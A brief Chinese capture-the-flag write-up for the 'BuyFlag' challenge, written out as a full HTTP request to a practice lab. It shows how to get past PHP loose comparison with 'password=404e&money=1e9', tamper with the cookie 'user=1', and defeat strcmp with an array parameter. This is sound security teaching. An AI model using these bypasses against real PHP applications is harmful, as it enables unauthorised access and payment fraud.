[极客大挑战 2019]BuyFlag
[极客大挑战 2019]BuyFlag
源代码的提示
<!--
~~~post money and password~~~
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (is_numeric($password)) {
echo "password can't be number</br>";
}elseif ($password == 404) {
echo "Password Right!</br>";
}
}
-->
直接贴包
POST /pay.php HTTP/1.1
Host: a12f4602-ae29-4d03-8446-117a204e1ed1.node5.buuoj.cn:81
Proxy-Connection: keep-alive
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://a12f4602-ae29-4d03-8446-117a204e1ed1.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: user=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Upgrade-Insecure-Requests: 1
Priority: u=0, i
password=404e&money=1e9
上面的404e是首先让他变成字符串,且因为是弱比较,所以等式也满足了,然后1e9是科学计数法的1000000000
还有一个payload=password=404a&mony[]=0
这是因为
strcmp比较的是字符串类型,如果强行传入其他类型参数,会出错,出错后返回值0,正是利用这点进行绕过。
借鉴PHP弱类型之strcmp绕过,所以用数组绕过他报错返回0,正好是strcmp左大于右的情况
要注意burpsuite来post的的时候
要改成POST /pay.php...
然后加一个Content-Type: application/x-www-form-urlencoded
再加入要传入的数据